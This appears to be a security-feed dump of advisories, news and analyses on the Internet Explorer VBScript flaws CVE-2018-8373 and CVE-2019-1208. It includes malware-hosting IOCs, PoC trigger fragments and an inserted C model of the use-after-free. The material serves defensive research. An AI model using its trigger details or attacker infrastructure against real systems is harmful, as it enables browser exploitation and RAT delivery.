Please see the references or vendor advisory for more information.\n", "modified": "2018-08-14T00:00:00", "published": "2018-08-14T00:00:00", "id": "SMNTC-105027", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105027", "type": "symantec", "title": "Microsoft Windows LNK CVE-2018-8345 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2020-11-22T03:08:33", "bulletinFamily": "info", "cvelist": ["CVE-2018-8353", "CVE-2018-8355", "CVE-2018-8359", "CVE-2018-8371", "CVE-2018-8372", "CVE-2018-8373", "CVE-2018-8385", "CVE-2018-8389", "CVE-2018-8390"], "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \u201cScripting Engine Memory Corruption Vulnerability.\u201d This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:58am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. 
Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-24T00:00:00", "published": "2018-08-15T00:00:00", "id": "AKB:D2380257-7D97-4A85-961C-A25C70361E50", "href": "https://attackerkb.com/topics/4b1HB0oydp/cve-2018-8373", "type": "attackerkb", "title": "CVE-2018-8373", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2018-09-26T20:08:16", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8174", "CVE-2018-8373"], "description": "A variant of a remote code execution vulnerability with Internet Explorer's scripting engine known as CVE-2018-8373 [patched last August](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) has been found in the wild. Looking at the IOCs [posted by our colleagues at TrendMicro](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-cve-2018-8373-exploit-spotted-in-the-wild/>), we recognized the infrastructure serving this exploit. The same static domain has been active [since at least early July](<https://www.virustotal.com/en/domain/www.myswcd.com/information/>), and is being redirected to from an adult website injected with a malicious script.\n\nIn the below traffic capture from August, we were served [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>), which is [thought](<https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/>) to be from the same author. 
It is interesting to note that this is not an exploit kit, but rather appears to be a single actor who implemented the available Proof of Concept to distribute his payload, the Quasar Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/09/traffic_08.png> \"\" )\n\nDuring our tests with this new variant of CVE-2018-8373, we found it to be quite unstable and failing to detonate its payload via Powershell invocation. However, a working CVE-2018-8174 was still serving the same payload we had captured back in August.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/09/error.png> \"\" )\n\nThe source code for CVE-2018-8373 has been uploaded to many platforms already ([PasteBin](<https://pastebin.com/W4aVvPVX>), [VirusTotal](<https://www.virustotal.com/#/file/96bdf283db022ca1729bbde82976c79d289ec5e66c799b3816275e62e422eb50/detection>)), including to the [AnyRun](<https://app.any.run/tasks/d7ae8ea4-9767-44de-9784-b5cdb4ee1756>) sandbox. That sample triggers the exploit and spawns PowerShell. In the following animation, we replayed this attack to show how our [anti-exploit technology](<https://www.malwarebytes.com/business/endpointprotectionandresponse/>) is able to mitigate this vulnerability at various levels.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/09/CVE-2018-8373.gif> \"\" )\n\nWe can expect that other threat actors will be looking at this code for possible implementation. 
However, unless it is improved, it is unlikely to be integrated into exploit kits, considering that its cousin, CVE-2018-8174, works flawlessly.\n\n### Indicators of compromise\n\nInjected adult site\n \n \n 198.211.33[.]67\n clubtubes[.]com\n\nExploit-serving domain\n \n \n 54.191.17[.]130\n myswcd[.]com/vol/m3.html,CVE-2018-8373\n myswcd[.]com/vol/m2.html,CVE-2018-8174\n myswcd[.]com/vol/me.html,CVE-2018-8174\n\nPayload\n \n \n myswcd[.]com/vol/s1.exe,Loader\n myswcd[.]com/vol/v1.exe,Installer\n myswcd[.]com/vol/v2.exe,Quasar RAT\n 7EEF6EF8FED53B7C3BF61BA821F375A0A433EA4CB0185FD223780B729A9A5792\n 268909BC33F0F8C5312B51570016311E3676AF651A57DE38E42241DCC177B2D6\n D9A967D0CAA8DB86FECA3AE469EF6797E81DFDAC4D8531658CB242A87C80CE05\n\nThe post [Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT](<https://blog.malwarebytes.com/threat-analysis/2018/09/buggy-implementation-of-cve-2018-8373-used-to-deliver-quasar-rat/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-09-26T17:13:26", "published": "2018-09-26T17:13:26", "id": "MALWAREBYTES:C7D9126F912DAC06B9FBA1B29BF174BC", "href": "https://blog.malwarebytes.com/threat-analysis/2018/09/buggy-implementation-of-cve-2018-8373-used-to-deliver-quasar-rat/", "type": "malwarebytes", "title": "Buggy implementation of CVE-2018-8373 vulnerability used to deliver Quasar RAT", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-12T08:23:05", "bulletinFamily": "blog", "cvelist": ["CVE-2018-17780", "CVE-2018-8373"], "description": "Last week on Labs was a busy one. 
We discussed how [SMS phishing attacks target the job market](<https://blog.malwarebytes.com/cybercrime/2018/09/mobile-menace-monday-sms-phishing-attacks-target-the-job-market/>), issued a warning for [TV Licensing phishes](<https://blog.malwarebytes.com/cybercrime/2018/09/100-channels-and-nothing-on-except-tv-licensing-phishes/>), commented on how Apple confused Safari users with recent [changes to how OSX handles browser extensions](<https://blog.malwarebytes.com/security-world/2018/09/safari-users-where-did-your-extensions-go/>), and elaborated on [holes found in Mojave\u2019s privacy protection](<https://blog.malwarebytes.com/security-world/privacy-security-world/2018/09/holes-found-in-mojaves-privacy-protection/>)\u2014deep breath! We also showed how a [buggy implementation of CVE-2018-8373 vulnerability is used to deliver Quasar RAT](<https://blog.malwarebytes.com/threat-analysis/2018/09/buggy-implementation-of-cve-2018-8373-used-to-deliver-quasar-rat/>), discussed what is needed to [fight back in the age of unwanted calls](<https://blog.malwarebytes.com/101/2018/09/phone-spampocalypse-fighting-back-in-the-age-of-unwanted-calls/>), gave some tips on [how to protect your data from Magecart and other e-commerce attacks](<https://blog.malwarebytes.com/cybercrime/2018/09/how-to-protect-your-data-from-magecart-and-other-e-commerce-attacks/>), and alerted our readers that [millions of accounts were affected in the latest Facebook vulnerability](<https://blog.malwarebytes.com/cybercrime/2018/09/millions-of-accounts-affected-in-latest-facebook-hack/>).\n\n### Other cybersecurity news:\n\n * [Tech firms back US privacy law](<https://www.washingtonpost.com/business/technology/the-latest-amazon-exec-warns-of-calif-privacy-approach/2018/09/26/ddb79270-c19d-11e8-9451-e878f96be19b_story.html?utm_term=.a40d184e1211>) to negate states. 
(Source: The Washington Post)\n * [Microsoft](<https://www.bleepingcomputer.com/news/security/microsoft-rolls-out-confidential-computing-for-azure/>) rolls out confidential computing for Azure. (Source: Bleeping Computer)\n * [Google](<https://www.blog.google/products/chrome/product-updates-based-your-feedback/>) recently made a change to simplify the way Chrome handles sign-in. (Source: The Keyword)\n * [VirusTotal](<https://medium.com/chronicle-blog/introducing-virustotal-enterprise-3a1607d79334>) announces VirusTotal Enterprise. (Source: medium.com)\n * [14 years imprisonment](<https://hotforsecurity.bitdefender.com/blog/14-years-prison-for-man-who-helped-hackers-evade-detection-by-anti-virus-software-20363.html>) for man who helped hackers evade detection by antivirus software. (Source: Hot for Security)\n * [Port of San Diego's](<https://www.portofsandiego.org/press-releases/general-press-releases/port-san-diego-927-update-cybersecurity-incident>) information technology systems disrupted by ransomware. (Source: Port of San Diego)\n * [LoJax](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>): the first UEFI rootkit found in the wild, courtesy of the Sednit group. (Source: WeLiveSecurity)\n * [Telegram](<https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html>) desktop client leaks end users' public/private IP addresses. (Source: inputzero)\n * [iPhone XS passcode](<https://threatpost.com/iphone-xs-passcode-bypass-hack-exposes-contacts-photos/137790/>) bypass hack exposes contacts and photos. (Source: ThreatPost)\n * Secret Service warns of surge in [ATM](<https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/>) 'wiretapping' attacks. (Source: Krebs on Security)\n * [Mutagen Astronomy](<https://www.theregister.co.uk/2018/09/27/mutagen_astronomy_linux/>): Linux kernel 'give me root, now' security hole sighted. 
(Source: TheRegister)\n\nStay safe, everyone!\n\nThe post [A week in security (September 24 \u2013 30)](<https://blog.malwarebytes.com/security-world/2018/10/a-week-in-security-september-24-30/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-10-01T16:44:20", "published": "2018-10-01T16:44:20", "id": "MALWAREBYTES:37E5B8085C06BEB2C5CED2D9549F29CB", "href": "https://blog.malwarebytes.com/security-world/2018/10/a-week-in-security-september-24-30/", "type": "malwarebytes", "title": "A week in security (September 24 \u2013 30)", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-08-14T19:13:11", "bulletinFamily": "info", "cvelist": ["CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8344", "CVE-2018-8345", "CVE-2018-8350", "CVE-2018-8373", "CVE-2018-8397", "CVE-2018-8414"], "description": "[](<https://1.bp.blogspot.com/-qwwoxa_7EJU/W3MgMLUnqBI/AAAAAAAAx2w/Vm6kHn_yEXcCGZdP9PzpzEq1AnAL0XqkQCLcBGAs/s728-e100/microsoft-windows-update.png>)\n\nGet your update caps on. \n \nJust a few minutes ago Microsoft released its latest monthly Patch Tuesday update for August 2018, patching a total of 60 vulnerabilities, of which 19 are rated as critical. \n \nThe updates patch flaws in Microsoft Windows, Edge Browser, Internet Explorer, Office, ChakraCore, .NET Framework, Exchange Server, Microsoft SQL Server and Visual Studio. \n \nTwo of the vulnerabilities patched by the tech giant are listed as publicly known and being exploited in the wild at the time of release. \n \nAccording to the [advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/ecb26425-583f-e811-a96f-000d3a33c573>) released by Microsoft, all 19 critical-rated vulnerabilities lead to remote code execution (RCE), some of which could eventually allow attackers to take control of the affected system if exploited successfully. 
\n \nBesides this, Microsoft has also addressed 39 important flaws, one moderate and one low in severity. \n\n\n \nBelow are brief details of a few of the critical vulnerabilities and of the publicly exploited important ones: \n \n\n\n### Internet Explorer Memory Corruption Vulnerability (CVE-2018-8373)\n\n \nThe first vulnerability under active attack is a critical remote code execution vulnerability that was revealed by Trend Micro last month and affects all supported versions of Windows. \n \nInternet Explorer 9, 10 and 11 are vulnerable to a memory corruption issue that could allow remote attackers to take control of the vulnerable system just by convincing a user to view a specially crafted website through Internet Explorer. \n \n\n\n> \"An attacker could also embed an ActiveX control marked \u2018safe for initialization\u2019 in an application or Microsoft Office document that hosts the IE rendering engine,\" Microsoft says in its advisory.\n\n \n\n\n### Windows Shell Remote Code Execution Vulnerability (CVE-2018-8414)\n\n \nThe second publicly known and actively exploited flaw resides in the Windows Shell and originates from improper validation of file paths. \n \nArbitrary code can be executed on the targeted system by convincing a victim to open a specially crafted file received via email or a web page. \n \n\n\n### Microsoft SQL Server RCE (CVE-2018-8273)\n\n \nMicrosoft SQL Server 2016 and 2017 are vulnerable to a buffer overflow that could be exploited remotely by an attacker to execute arbitrary code in the context of the SQL Server Database Engine service account. \n\n\n \nSuccessful exploitation of the vulnerability requires a remote attacker to submit a specially crafted query to an affected SQL server. \n \n\n\n### Windows PDF Remote Code Execution Vulnerability (CVE-2018-8350)\n\n \nWindows 10 systems with Microsoft Edge set as the default browser can be compromised merely by convincing a user to view a website. 
\n \nDue to improper handling of objects in memory, Windows 10's PDF library could be exploited by a remote attacker to execute arbitrary code on the targeted system. \n\n\n> \"The attacker could also take advantage of compromised websites or websites that accept or host user-provided content or advertisements, by adding specially crafted PDF content to such sites,\" Microsoft says in its advisory.\n\n> \"Only Windows 10 systems with Microsoft Edge set as the default browser can be compromised simply by viewing a website.\"\n\n \n\n\n### Microsoft Exchange Memory Corruption Vulnerability (CVE-2018-8302)\n\n \nThis vulnerability resides in the way Exchange handles objects in memory, allowing a remote attacker to run arbitrary code in the context of the System user just by sending a specially crafted email to the vulnerable Exchange server. \n \nThe flaw affects Microsoft Exchange Server 2010, 2013 and 2016. \n \n\n\n### Microsoft Graphics Remote Code Execution Vulnerability (CVE-2018-8344)\n\n \nMicrosoft revealed that the Windows font library improperly handles specially crafted embedded fonts, which could allow attackers to take control of the affected system by serving malicious embedded fonts via a specially crafted website or document file. \n \nThis vulnerability affects Windows 10, 8.1, and 7, and Windows Server 2016 and 2012. \n \n\n\n### LNK Remote Code Execution Vulnerability (CVE-2018-8345)\n\n \nThis vulnerability exists in the .LNK shortcut file format used by Microsoft Windows 10, 8.1, 7 and Windows Server editions. \n \nAn attacker can use a malicious .LNK file and an associated malicious binary to execute arbitrary code on the targeted system. Successful exploitation of this vulnerability could allow attackers to gain the same user rights on the target Windows system as the local user. 
\n\n\n \nAccording to the Microsoft advisory, user accounts configured with fewer user rights on the system are less impacted by this vulnerability than users who operate with administrative user rights. \n \n\n\n### GDI+ Remote Code Execution Vulnerability (CVE-2018-8397)\n\n \nThis RCE flaw resides in the way the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to take control of the affected system if exploited successfully. \n\n\n> \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\" Microsoft says in its advisory explaining the flaw.\n\n> \"Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\"\n\nThe vulnerability affects Windows 7 and Windows Server 2008. \n \nBesides this, Microsoft has also pushed security updates for [vulnerabilities in Adobe products](<https://thehackernews.com/2018/08/adobe-patch-updates.html>), details of which you can find in a separate article posted today. \n \nUsers are strongly advised to apply security patches as soon as possible to keep attackers from taking control of their computers. \n \nTo install the security updates, go to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or install the updates manually. \n\n\nHave something to say about this article? 
Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2018-08-14T18:36:07", "published": "2018-08-14T18:32:00", "id": "THN:F033FC8698702175A4736D089C3C9D13", "href": "https://thehackernews.com/2018/08/microsoft-patch-updates.html", "type": "thn", "title": "Microsoft Releases Patches for 60 Flaws\u2014Two Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}], "myhack58": [{"lastseen": "2018-08-18T12:22:20", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2015-6332", "CVE-2018-8373", "CVE-2018-8242"], "description": "Background \nOn 15 August 2018, the security company Trend Micro disclosed an in-the-wild 0day attack it had captured in July of this year. The attack exploits a code execution vulnerability in the Windows VBScript engine. Analysis and comparison show that it shares several attack techniques with the \u201cdouble kill\u201d vulnerability that 360 first discovered in April 2018, which affects the IE browser and is delivered through Office documents (see reference [1]); the two are very likely the work of the same group. \n360 Threat Intelligence Center analyzed and confirmed the 0day as soon as it was disclosed, and through big-data correlation linked this in-the-wild attack to the DarkHotel APT group. 
\n\nSource \nOn 15 August 2018, Trend Micro published a technical analysis of an in-the-wild 0day exploit sample it had captured on 11 July of this year. Microsoft had fixed the vulnerability the day before; its identifier is CVE-2018-8373. \n\nTimeline of the three \u201cdouble kill\u201d 0day vulnerabilities \nCVE-2018-8373 is in fact the third vulnerability found in the Windows VBScript engine this year; the first two were discovered by 360 security researchers. All three affect the IE browser and can be exploited through Microsoft Office documents. The discovery timeline of the three \u201cdouble kill\u201d 0days is as follows: \n\n| CVE | Discovered | Fixed | Description |\n| --- | --- | --- | --- |\n| CVE-2018-8174 | 2018.4.18 | 2018.5.8 | In-the-wild \u201cdouble kill\u201d vulnerability affecting Office and IE |\n| CVE-2018-8242 | | 2018.7.10 | Discovered by 360 security researchers and reported to Microsoft (reference [2]) |\n| CVE-2018-8373 | 2018.7.11 | 2018.8.14 | In-the-wild \u201cdouble kill\u201d vulnerability affecting Office and IE |\n\nAttribution and correlation \nRecovering the redacted IOC \nThrough big-data correlation, 360 Threat Intelligence Center was the first to obtain the IOC address that Trend Micro had redacted in its post: \nhttp://windows-updater.net/realmuto/wood.php?who=1?????? \nCorrelating a related 0day attack sample \nWe also found an Office document sample, suspected to have been used in a 0day attack on the same day as the in-the-wild \u201cdouble kill\u201d 0day attack captured by Trend Micro. The domain embedded in the document and the URL format match the one given by Trend Micro (http://windows-updater.net/stack/ov.php?w=1\\x00who=1): \n![](/Article/UploadPic/2018-8/2018818164226756.png) \nConfirming the link to DarkHotel \nAs soon as we had the domain used in the 0day attack, we recognized it as one of the domains used in the latest DarkHotel APT campaign, which 360 Threat Intelligence Center published in May of this year (see reference [4]): \n![](/Article/UploadPic/2018-8/2018818164226401.png) \n![](/Article/UploadPic/2018-8/2018818164227720.png) \nEntering the domain into the 360 Threat Intelligence Center platform immediately associates it with DarkHotel: \n![](/Article/UploadPic/2018-8/2018818164227684.png) \nCVE-2018-8373 vulnerability analysis \nBelow is the trigger code of the POC given by Trend Micro: \n![](/Article/UploadPic/2018-8/2018818164227680.png) \nComparing it with the CVE-2018-8174 POC that 360 captured in May of this year: the root cause of CVE-2018-8174 is that Class_Terminate can keep assigning to a memory object that has already been released, giving a use-after-free, whereas in CVE-2018-8373 a Property Get operation of a class can change the length of an array member of that class, so that the array's memory is reused after it has been released: \n![](/Article/UploadPic/2018-8/2018818164227915.png) \nThe POC code is very simple. The class VulClass defines an array member variable and two methods, Class_Initialize and Public Default Property Get P. \nClass_Initialize is an older VB mechanism that runs when an instance of the class is created; by overriding it, a class can perform its own initialization as soon as it is created with New. \nDefault Property marks the default property of a class. Here Public Default Property Get P is overridden, so that accessing the class instance itself triggers the property's code, which in the POC executes ReDim Preserve array(1). 
\nReDim reallocates the array's memory; inside the VB engine this ultimately goes through the SafeArrayRedim function, which readers familiar with VB vulnerabilities will recognize as the root of the earlier CVE-2014-6332 vulnerability: \n![](/Article/UploadPic/2018-8/2018818164227987.png) \nThe first line of the POC is executed first. New goes through VBScriptClass::InitializeClass, and because VulClass overrides Class_Initialize, vbscript!CScriptEntryPoint::Call dispatches to the Class_Initialize method implemented by the script: \nSet cls = New VulClass \n![](/Article/UploadPic/2018-8/2018818164227605.png) \nClass_Initialize sets the length of the array member: \nPrivate Sub Class_Initialize \n    ReDim array(2) \nEnd Sub \nThe array object generated at this point is shown below; it has 3 elements, and its pvData is 0x0514dfd0: \n![](/Article/UploadPic/2018-8/2018818164228601.png) \nThe VB engine parses the next line from left to right, so the cls.array(2) access is handled first: \ncls.array(2) = cls \nThis calls vbscript!AccessArray to check whether element (2) of the array can be accessed; at this point it fetches the array's memory object, as shown below: \n\n\n**[1] [[2]](<91201_2.htm>) [[3]](<91201_3.htm>) [next](<91201_2.htm>)**\n", "edition": 1, "modified": "2018-08-18T00:00:00", "published": "2018-08-18T00:00:00", "id": "MYHACK58:62201891201", "href": "http://www.myhack58.com/Article/html/3/62/2018/91201.htm", "title": "Use CVE-2018-8373 0day vulnerabilities the attacks the Darkhotel gang-related analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T10:34:17", "bulletinFamily": "info", "cvelist": ["CVE-2018-8373", "CVE-2019-1208"], "description": "Six months ago I reported to Microsoft a [UAF](<https://cwe.mitre.org/data/definitions/416.html>) (use-after-free) vulnerability in the IE browser. Microsoft rated it Critical, assigned it the identifier [CVE-2019-1208](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1208>), and fixed it in the September [Patch Tuesday](<https://blog.trendmicro.com/trendlabs-security-intelligence/september-patch-tuesday-bears-more-remote-desktop-vulnerability-fixes-and-two-zero-days/>) release. I found the flaw with [BinDiff](<https://www.zynamics.com/bindiff.html>), a binary code comparison tool, and wrote a PoC that demonstrates how to exploit it on Windows 10 RS5.\n\nThis article briefly describes the research process; for an in-depth analysis of the vulnerability, see the [technical brief](<https://documents.trendmicro.com/assets/Tech-Brief-A-Proof-of-Concept-Exploiting-CVE-2019-1208-in-Internet-Explorer.pdf>).\n\n0x01 CVE-2019-1208 \nAs mentioned above, CVE-2019-1208 is a UAF vulnerability. 
Such flaws can corrupt data, crash the process and, depending on how the vulnerability is triggered, allow arbitrary or remote code execution. An attacker who successfully exploits CVE-2019-1208 gains the same privileges as the current user; if that user has administrative rights, the attacker can take over the affected system, for example installing or uninstalling programs, viewing or modifying data, or creating new accounts with full user rights. \n\n0x02 Potential impact \nIn a straightforward attack scenario, an attacker sends phishing messages to unsuspecting users and lures them into visiting, with the IE browser, a malicious website that contains the CVE-2019-1208 exploit code. Alternatively, the attacker can send spam whose attachments contain the exploit code: Microsoft Office documents that host the IE rendering engine, or application files that embed an ActiveX control carrying the exploit. The attacker could also host the exploit on a compromised legitimate site that accepts user-provided content such as advertisements. \n![](/Article/UploadPic/2019-9/2019917134346354.png) \nFigure 1. VbsJoin code execution flow \n\n0x03 Discovery process \nThe story began with BinDiff, when I compared the May and June versions of vbscript.dll, the module that implements the VBScript engine's API functions, to see which functions had changed. I found that Microsoft had modified SafeArrayAddRef, SafeArrayReleaseData and SafeArrayReleaseDescriptor. 
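The SafeArray handling that both VBScript bugs on this page hinge on can be modelled in a few dozen lines of C. The program below is an added illustration for this corpus page, not code from vbscript.dll, from the 360 analysis above or from this article: Block, SafeArray and the sa_* functions are simplified stand-ins for tagSAFEARRAY, SafeArrayAddRef/SafeArrayRelease* and SafeArrayRedim, and released blocks are only flagged rather than returned to an allocator, so that a stale access is reported deterministically instead of being undefined behaviour. The first scenario is the CVE-2018-8373 shape walked through above: AccessArray resolves the address of cls.array(2), the Default Property Get callback runs ReDim Preserve array(1), and the store lands in the released block. The lock-based fix shown for it is one illustrative mitigation (SafeArrayRedim refuses an array whose cLocks is non-zero), not a claim about Microsoft's patch. The second scenario shows why a reference taken on an array before a script callback must be released on that same object afterwards, which is the pairing the SafeArrayAddRef/SafeArrayRelease* functions just named exist for.

```c
/* Added model of the "script callback inside a native SafeArray operation" bug
 * class behind CVE-2018-8373 and CVE-2019-1208. Not code from vbscript.dll or
 * either article: Block/SafeArray/sa_* are simplified stand-ins for tagSAFEARRAY,
 * SafeArrayAddRef/SafeArrayRelease* and SafeArrayRedim. Released blocks are
 * only flagged, never reused, so a stale access is reported deterministically. */
#include <stdio.h>
#include <string.h>
#define POOL  8
#define ELEMS 8
typedef struct { long elems[ELEMS]; int freed; } Block;                  /* pvData */
typedef struct { unsigned refs, locks, count; Block *store; int freed; } SafeArray;
enum { OK = 0, ERR_BOUNDS = 1, ERR_LOCKED = 2, ERR_UAF = 3 };
static Block      g_blocks[POOL];
static SafeArray  g_descs[POOL];
static int        g_nblocks, g_ndescs;
static SafeArray *g_arr;                   /* the script variable "arr" */
static void     (*g_callback)(void);       /* the Default Property Get hook */

static void pool_reset(void) {
    memset(g_blocks, 0, sizeof g_blocks); memset(g_descs, 0, sizeof g_descs);
    g_nblocks = g_ndescs = 0; g_arr = NULL; g_callback = NULL;
}
static SafeArray *sa_new(unsigned count) { /* one reference, held by the variable */
    SafeArray *sa = &g_descs[g_ndescs++];
    sa->refs = 1; sa->locks = 0; sa->count = count; sa->freed = 0;
    sa->store = &g_blocks[g_nblocks++];
    return sa;
}
static void sa_addref(SafeArray *sa) { sa->refs++; }
static void sa_release(SafeArray *sa) { if (--sa->refs == 0) sa->store->freed = sa->freed = 1; }
/* ReDim Preserve: like SafeArrayRedim, refused while cLocks != 0; otherwise the
 * old element block is released and a fresh one takes its place. */
static int sa_redim(SafeArray *sa, unsigned count) {
    if (sa->locks) return ERR_LOCKED;
    Block *nb = &g_blocks[g_nblocks++];
    memcpy(nb->elems, sa->store->elems, (count < sa->count ? count : sa->count) * sizeof(long));
    sa->store->freed = 1; sa->store = nb; sa->count = count;
    return OK;
}
/* CVE-2018-8373 shape: AccessArray resolves the element address, the property
 * get callback runs ReDim on the same array, then the store happens. */
static int access_store_vuln(unsigned idx, long value) {
    SafeArray *sa = g_arr;
    if (idx >= sa->count) return ERR_BOUNDS;
    Block *owner = sa->store;
    long  *slot  = &owner->elems[idx];     /* cached before the callback */
    if (g_callback) g_callback();
    if (owner->freed) return ERR_UAF;      /* the write would land in released memory */
    *slot = value;
    return OK;
}
static int access_store_fixed(unsigned idx, long value) {
    SafeArray *sa = g_arr;
    sa->locks++;                           /* locked across the callback: ReDim fails */
    if (g_callback) g_callback();
    sa->locks--;
    if (idx >= sa->count) return ERR_BOUNDS; /* re-validate before touching pvData */
    sa->store->elems[idx] = value;
    return OK;
}
/* CVE-2019-1208 shape: Join(arr) takes a reference, runs the callback, then releases
 * "arr". If the callback replaced arr, the vulnerable version releases the new
 * array, which nobody AddRef'd, and it is freed at count zero. */
static int join_vuln(void) {
    sa_addref(g_arr);
    if (g_callback) g_callback();
    sa_release(g_arr);                     /* whatever arr refers to now */
    return g_arr->freed ? ERR_UAF : OK;    /* the script's next arr(0) = ... hits it */
}
static int join_fixed(void) {
    SafeArray *held = g_arr;               /* release exactly what was referenced */
    sa_addref(held);
    if (g_callback) g_callback();
    sa_release(held);
    return g_arr->freed ? ERR_UAF : OK;
}
/* Script-side callbacks as the two PoCs describe them. */
static void cb_redim_preserve_1(void) { (void)sa_redim(g_arr, 1); }  /* ReDim Preserve array(1) */
static void cb_replace_arr(void) {                                    /* arr = Array(0) */
    SafeArray *old = g_arr;
    g_arr = sa_new(1);
    sa_release(old);                       /* the variable drops the old array */
}
static int run_8373(int (*op)(unsigned, long)) {
    pool_reset();
    g_arr = sa_new(3);                     /* Class_Initialize: ReDim array(2) -> 3 elements */
    g_callback = cb_redim_preserve_1;      /* Public Default Property Get P */
    return op(2, 0x41);                    /* cls.array(2) = cls */
}
static int run_1208(int (*op)(void)) {
    pool_reset();
    g_arr = sa_new(1);                     /* arr = Array(New MyClass) */
    g_callback = cb_replace_arr;
    return op();                           /* arr(0) = Join(arr) */
}
int main(void) {
    printf("8373: vuln=%d fixed=%d\n", run_8373(access_store_vuln), run_8373(access_store_fixed));
    printf("1208: vuln=%d fixed=%d\n", run_1208(join_vuln), run_1208(join_fixed));
    return 0;
}
```

Compile with any C99 compiler and run: the two vulnerable paths return ERR_UAF (3) and the two fixed paths return OK (0). In real VBScript the refused ReDim in the locked variant surfaces as runtime error 10, "This array is fixed or temporarily locked", which is the visible symptom of the array being protected across the callback. Note also that join_vuln leaks the original descriptor at a reference count of one; that leak is the other half of the same mistake, since the reference was taken on the old array and never dropped.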
\nAfter further research, and inspired by CVE-2018-8373, a vulnerability I had found earlier, I used VBScriptClass to trigger a UAF as follows: \n1. arr = Array(New MyClass): create a SafeArray and store the VBScriptClass MyClass in arr[0]. \n2. Callback, arr = Array(0): Join(arr) triggers the Public Default Property Get callback of MyClass. The callback creates a new SafeArray for the variable arr. As shown in Figure 1, this new SafeArray is not protected by SafeArrayAddRef, because the callback has interrupted the engine's normal code flow. \n3. arr(0) = Join(arr): when the Public Default Property Get callback returns, VbsJoin's code flow calls SafeArrayReleaseData and SafeArrayReleaseDescriptor to decrement the reference counts of the SafeArray data and descriptor. But the new SafeArray was never protected by SafeArrayAddRef, so its data and descriptor reference counts are 0, and both are freed by SafeArrayReleaseData and SafeArrayReleaseDescriptor, as shown in Figure 2. \n\n\n**[1] [[2]](<96031_2.htm>) [next](<96031_2.htm>)**\n", "edition": 1, "modified": "2019-09-17T00:00:00", "published": "2019-09-17T00:00:00", "id": "MYHACK58:62201996031", "href": "http://www.myhack58.com/Article/html/3/62/2019/96031.htm", "title": "From BinDiff to 0day: Internet Explorer UAF vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-13T15:28:15", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2014-6332", "CVE-2016-0189", "CVE-2018-8373", "CVE-2017-0149"], "description": "At the end of October last year, I obtained a CVE-2016-0189 exploit sample that differs from the publicly known one. 
